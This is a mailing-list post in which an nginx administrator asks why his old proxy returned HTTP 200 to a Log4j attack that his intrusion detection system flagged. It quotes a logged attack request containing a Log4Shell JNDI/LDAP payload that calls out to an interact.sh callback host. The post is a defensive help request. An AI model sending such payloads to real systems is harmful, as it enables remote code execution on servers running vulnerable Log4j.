Dear Users,
I have an old instance of NGINX (v.1.10.1) running as proxy server on a
dedicated hardware platform.
Since the proxy service is reachable from internet, it is constantly exposed to
cyber attacks.
In my particular case, it is attacked by a lot of Log4j attack attempts from
several malicious IPs.
At this moment, an host intrusion detection system (HIDS) is running and is
protecting the NGINX server: it seems it is blocking every malicious attack
attempts.
Anyway, during the last attack mail notification sent by the HIDS, I noticed
that the NGINX server response was “HTTP/1.1 200” and I’m very worried about it.
Log4j and Java packages are NOT installed on the NGINX server and all the
servers behind the proxy are not using Log4j.
Could you please help me to understand the reason why the NGINX server answer
was “HTTP/1.1 200”!?
You can see below the mail notification I received:
Attack Notification.
2021 Dec 28 20:45:59
Received From: “hidden_NGINX_server_IP” >/var/log/nginx/access.log
Rule: 100205 fired (level 12) -> "Log4j RCE attack attempt detected."
Src IP: 166.137.252.110
Portion of the log(s):
166.137.252.110 - - [28/Dec/2021:21:45:58 +0100] "GET
/?sulgz=${jndi:ldap://“hidden_NGINX_server_IP
<ldap://%E2%80%9Chidden_server_IP>".c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a
<ldap://193.204.199.214.c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a>}
HTTP/1.1" 200 3700 "-" "curl/7.64.0" “-"
Thank you in advance,
Mauro _______________________________________________
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx
